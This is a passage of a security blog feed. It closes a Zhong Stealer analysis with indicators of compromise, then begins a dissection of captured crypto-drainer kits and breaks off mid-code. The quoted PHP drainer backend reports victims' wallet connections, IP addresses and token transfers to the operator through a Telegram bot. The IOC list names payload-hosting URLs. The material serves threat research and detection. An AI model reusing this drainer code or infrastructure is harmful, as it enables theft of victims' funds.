srcset="https://substackcdn.com/image/fetch/$s_!lwNJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 424w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 848w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 1272w, https://substackcdn.com/image/fetch/$s_!lwNJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb62628d5-0c20-4ffa-8be1-0382702c3ab2_1444x1012.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Zhong Stealer attempting to read sensitive information from Brave Browser</figcaption></figure></div><p>The rest is a well-known story: our Secret Santa turns into a Krampus. </p><p>To avoid falling into the same trap, remember: even on Christmas Eve, not every package is a gift. Let suspicious packages be handled by your security team&#8212;and don&#8217;t open them yourself. </p><p>Stay safe!</p><div><hr></div><h2>IOCs</h2><pre><code>FileHash-MD5:778b6521dd2b07d7db0eaeaab9a2f86b
FileHash-SHA1:ce120e922ed4156dbd07de8335c5a632974ec527
FileHash-SHA256:02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827f
FileHash-SHA256:1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf
FileHash-SHA256:4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e
FileHash-SHA256:dd44dabff5361aa9b845dd891ad483162d4f28913344c93e5d59f648a186098
FileHash-SHA256:e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd
FileHash-SHA256:5f422be165e4b6557f45719914f724a4fe1840fa792ecc739861bfdb45c1550
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLogin.log
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/TASLoginBase.dll
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/down.exe
URL:hxxps://kkuu.oss-cn-hongkong.aliyuncs[.]com/ss/uu.txt
email:zhongmaziil992@outlook.com
hostname:kkuu.oss-cn-hongkong.aliyuncs[.]com
IPv4:156.245.23.188
IPv4:47.79.64.228</code></pre><div><hr></div><h2>References</h2><ul><li><p><a href="https://otx.alienvault.com/pulse/6765d32b0d4beec4aa588be1">LevelBlue Threat Exchange - Original Intelligence Pulse (December 2024)</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Drainers Autopsies]]></title><description><![CDATA[Dissecting the code behind crypto heists]]></description><link>https://quetzal.bitso.com/p/drainers-autopsies</link><guid isPermaLink="false">https://quetzal.bitso.com/p/drainers-autopsies</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 15 Nov 2024 18:00:52 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!z0mb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!z0mb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!z0mb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!z0mb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png" width="494" height="494" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:494,&quot;bytes&quot;:1976731,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!z0mb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!z0mb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fba4a7fab-cabb-42f9-bc04-134e1c8d28fc_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We&#8217;ve written a lot about <em>drainers</em> on this blog, showing how these contracts and implants are equally <em><a href="https://quetzal.bitso.com/p/drainers">smart</a></em><a href="https://quetzal.bitso.com/p/drainers"> and </a><em><a href="https://quetzal.bitso.com/p/drainers">malicious</a></em>. They employ large criminal ecosystems and, at times, posing as schemes <a href="https://quetzal.bitso.com/p/wallet-inspector">so ridiculous</a> they're almost laughable, yet they trick users into losing their funds with a single click.</p><p>But today, we&#8217;re going to get our hands dirty&#8212;not with oily, flammable substances to burn it all down, as you&#8217;re used to <a href="https://quetzal.bitso.com/p/it-never-drains-but-it-pours">when reading my articles</a>&#8212;but in a different way. </p><p>We&#8217;ve captured four drainer samples with complete frontend and backend source code, and we&#8217;re about to run a series of autopsies on them to understand how they&#8217;re trying to deceive victims, what goes on backstage, and the threat actors' thinking behind them. </p><p>Enough talk. Let me welcome you to <strong>Dr Ainer</strong>&#8217;s <em>absolutely</em> legitimate clinic. Grab a pair of gloves and that Netter book&#8212;things are about to get messy.</p><div><hr></div><h2><em><strong>&#129503;&#8205;&#9794;&#65039; </strong>Dr Ainer</em>, to the autopsy theatre immediately</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!U9Xm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!U9Xm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!U9Xm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png" width="430" height="430" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:430,&quot;bytes&quot;:1536587,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!U9Xm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!U9Xm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b21f6c7-9140-4399-b952-916f5506f706_1024x1024.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Absolutely legit medical credentials</figcaption></figure></div><p>Our first patient is &#8216;<em>ETH Polygon BNB</em>&#8217;, which seems to be missing a few pieces but somehow still manages to function (aren't we all just like that at this time of year?).</p><p>With a simple HTML template and a PHP backend, our first task as <a href="https://en.wikipedia.org/wiki/Quackery"><s>quacks</s></a> reputable smart contract field surgeons doesn't seem too challenging.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-16X!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-16X!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 424w, https://substackcdn.com/image/fetch/$s_!-16X!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 848w, https://substackcdn.com/image/fetch/$s_!-16X!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 1272w, https://substackcdn.com/image/fetch/$s_!-16X!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-16X!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png" width="1456" height="731" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/34540123-a4e0-4548-b7ff-c77bda03294a_3350x1682.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:731,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:182494,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-16X!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 424w, https://substackcdn.com/image/fetch/$s_!-16X!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 848w, https://substackcdn.com/image/fetch/$s_!-16X!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 1272w, https://substackcdn.com/image/fetch/$s_!-16X!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7918e750-f5a6-47fe-a47a-d21eb7353816_3350x1682.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">HTML rendering of the drainer #1 template</figcaption></figure></div><p>Some time ago, the LENS protocol <a href="https://x.com/LensProtocol/status/1526925886741684225">allowed users to claim and </a><em><a href="https://x.com/LensProtocol/status/1526925886741684225">mint</a></em><a href="https://x.com/LensProtocol/status/1526925886741684225"> handles</a>, but in most cases, users had to be previously whitelisted or attend specific conferences or events. Naturally, this generated high demand. Our first patient seems to prey on that desire for LENS handles&#8212;and it shows. </p><p>This HTML template restricts itself to mimicking the LENS claim site and calling the following JS libraries</p><ul><li><p><strong>ethers.js</strong> (official)</p></li><li><p><strong>web3.js</strong> (official)</p></li><li><p><strong>web3-connect.js</strong> (local version)</p></li><li><p><strong>ethers.js</strong> (local version)</p></li><li><p><strong>web3-provider.js</strong> (local version)</p></li></ul><p>Let&#8217;s take a look under the hood. Scalpel, please.</p><pre><code>&lt;?PHP

// =====================================================================
// ========================= &#1053;&#1040;&#1057;&#1058;&#1056;&#1054;&#1049;&#1050;&#1048; &#1057;&#1050;&#1056;&#1048;&#1055;&#1058;&#1040; =========================
// =====================================================================

define('BOT_TOKEN', '53427<strong>[REDACTED]</strong>gqTT10'); // &#1058;&#1086;&#1082;&#1077;&#1085; &#1073;&#1086;&#1090;&#1072; Telegram &#1080;&#1079; @BotFather
define('CHAT_ID', '-<strong>[REDACTED]</strong>'); // ID &#1074;&#1072;&#1096;&#1077;&#1075;&#1086; &#1095;&#1072;&#1090;&#1072; &#1080;&#1083;&#1080; &#1082;&#1072;&#1085;&#1072;&#1083;&#1072;, &#1082;&#1091;&#1076;&#1072; &#1073;&#1091;&#1076;&#1091;&#1090; &#1080;&#1076;&#1090;&#1080; &#1091;&#1074;&#1077;&#1076;&#1086;&#1084;&#1083;&#1077;&#1085;&#1080;&#1103; &#1089; &#1089;&#1072;&#1081;&#1090;&#1072;
// =====================================================================
// ============ &#1042;&#1053;&#1054;&#1057;&#1048;&#1058;&#1068; &#1048;&#1047;&#1052;&#1045;&#1053;&#1045;&#1053;&#1048;&#1071; &#1042; &#1050;&#1054;&#1044; &#1053;&#1048;&#1046;&#1045; &#1053;&#1045; &#1041;&#1045;&#1047;&#1054;&#1055;&#1040;&#1057;&#1053;&#1054; ==============
// =====================================================================</code></pre><p>Even if you can&#8217;t read Russian (or <a href="https://en.wikipedia.org/wiki/PHP">PHP</a> at all), you might get a sense of what&#8217;s happening here. The attacker is using a Telegram bot as a communication channel. The comments actually translate as follows:</p><blockquote><p><em>&#127479;&#127482; &#1053;&#1040;&#1057;&#1058;&#1056;&#1054;&#1049;&#1050;&#1048; &#1057;&#1050;&#1056;&#1048;&#1055;&#1058;&#1040;</em></p><p>&#127468;&#127463; Script configuration</p></blockquote><blockquote><p><em>&#127479;&#127482; &#1058;&#1086;&#1082;&#1077;&#1085; &#1073;&#1086;&#1090;&#1072; Telegram &#1080;&#1079; BotFather</em></p><p>&#127468;&#127463; BotFather Telegram bot token</p><p><em>BotFather is the bot you talk to in Telegram in order to create or manage bots</em></p></blockquote><blockquote><p>&#127479;&#127482; <em>ID &#1074;&#1072;&#1096;&#1077;&#1075;&#1086; &#1095;&#1072;&#1090;&#1072; &#1080;&#1083;&#1080; &#1082;&#1072;&#1085;&#1072;&#1083;&#1072;, &#1082;&#1091;&#1076;&#1072; &#1073;&#1091;&#1076;&#1091;&#1090; &#1080;&#1076;&#1090;&#1080; &#1091;&#1074;&#1077;&#1076;&#1086;&#1084;&#1083;&#1077;&#1085;&#1080;&#1103; &#1089; &#1089;&#1072;&#1081;&#1090;&#1072;</em></p><p>&#127468;&#127463; Your channel ID where notifications from the site are sent</p></blockquote><blockquote><p><em>&#127479;&#127482; &#1042;&#1053;&#1054;&#1057;&#1048;&#1058;&#1068; &#1048;&#1047;&#1052;&#1045;&#1053;&#1045;&#1053;&#1048;&#1071; &#1042; &#1050;&#1054;&#1044; &#1053;&#1048;&#1046;&#1045; &#1053;&#1045; &#1041;&#1045;&#1047;&#1054;&#1055;&#1040;&#1057;&#1053;&#1054;</em> </p><p>&#127468;&#127463; Not safe to make changes from now on</p></blockquote><p>The PHP backend includes a function that checks for specific IP ranges from CloudFlare to prevent these addresses from interacting with the website.</p><pre><code>if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
  $cf_ip_ranges = [   '204.93.240.0/24','204.93.177.0/24','199.27.128.0/21','173.245.48.0/20','103.21.244.0/22','103.22.200.0/22','103.31.4.0/22','141.101.64.0/18',
'108.162.192.0/18','190.93.240.0/20','188.114.96.0/20','197.234.240.0/22','198.41.128.0/17','162.158.0.0/15'
  ];
  foreach ($cf_ip_ranges as $range) {
    if (ip_in_range($_SERVER['REMOTE_ADDR'], $range)) {
      $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
      break;
    }
  }
}</code></pre><p>The <code>ip-api </code><a href="https://ip-api.com">API</a> is also queried to determine the visitor&#8217;s country based on their IP address.</p><pre><code>function getCountryFromIP($address) {
  $ch = curl_init("http://ip-api.com/json/$address");
  [...]
  if (json_last_error() === JSON_ERROR_NONE) {
    return $response['status'] == 'success' ? $response['countryCode'] : 'UNK';
  } else {
    return 'UNK';
  }
}</code></pre><p>At this point, malicious interactions with the drainer have already taken place via the JS libraries, which aren&#8217;t malicious per se&#8212;they&#8217;re simply doing what they&#8217;re designed to do: interacting with smart contracts. Finally, the backend checks the <code>$_GET['action']</code> variable to determine the next step and communicate with the operator.</p><pre><code>if (isset($_GET['action']) &amp;&amp; $_GET['action'] == '<strong>retrive</strong>') {
  $approves = json_decode(file_get_contents('approve.json'), true);
  file_put_contents('approve.json', '[]');
  exit(json_encode($approves));
} elseif (isset($_GET['action']) &amp;&amp; $_GET['action'] == '<strong>transfer_token</strong>') {
  $chain_name = $_GET['chain_id'] == 1 ? '<em>Ethereum</em>' : 
  ($_GET['chain_id'] == 56 ? 'BNB Smart Chain' : '<em>Polygon</em>');
  sendTelegramMessage("
  &lt;b&gt;&#128142; <strong>&#1054;&#1090;&#1087;&#1088;&#1072;&#1074;&#1083;&#1077;&#1085; &#1090;&#1086;&#1082;&#1077;&#1085;</strong>&lt;/b&gt;\n\n
  &lt;b&gt;&#9939; <strong>&#1057;&#1077;&#1090;&#1100;</strong>:&lt;/b&gt; &lt;code&gt;$chain_name&lt;/code&gt;\n
  &lt;b&gt;&#128142; <strong>&#1058;&#1086;&#1082;&#1077;&#1085;</strong>:&lt;/b&gt; &lt;code&gt;$_GET[token]&lt;/code&gt;\n
  &lt;b&gt;&#128176; <strong>&#1057;&#1091;&#1084;&#1084;&#1072;</strong>:&lt;/b&gt; &lt;code&gt;$_GET[amount]$&lt;/code&gt;");
}

if ($data['action'] == '<strong>visit</strong>') {  
} elseif ($data['action'] == '<strong>connect</strong>') {
  sendTelegramMessage("
  &lt;b&gt;&#129418; <strong>&#1055;&#1086;&#1076;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085; &#1082;&#1086;&#1096;&#1077;&#1083;&#1077;&#1082;</strong>&lt;/b&gt;\n\n
  &lt;b&gt;&#127760; <strong>IP &#1072;&#1076;&#1088;&#1077;&#1089;</strong>:&lt;/b&gt; $_SERVER[REMOTE_ADDR]\n
  &lt;b&gt;&#127988;&#8205;&#9760;&#65039; <strong>&#1057;&#1090;&#1088;&#1072;&#1085;&#1072;</strong>:&lt;/b&gt; $visitor_country\n\n
  &lt;b&gt;&#128091; <strong>&#1040;&#1076;&#1088;&#1077;&#1089;</strong>:&lt;/b&gt; https://debank.com/profile/$data[address]");
} elseif ($data['action'] == '<strong>transfer_native</strong>') {
  $chain_name = convertCIDtoCName($data['chain_id']);
  sendTelegramMessage("
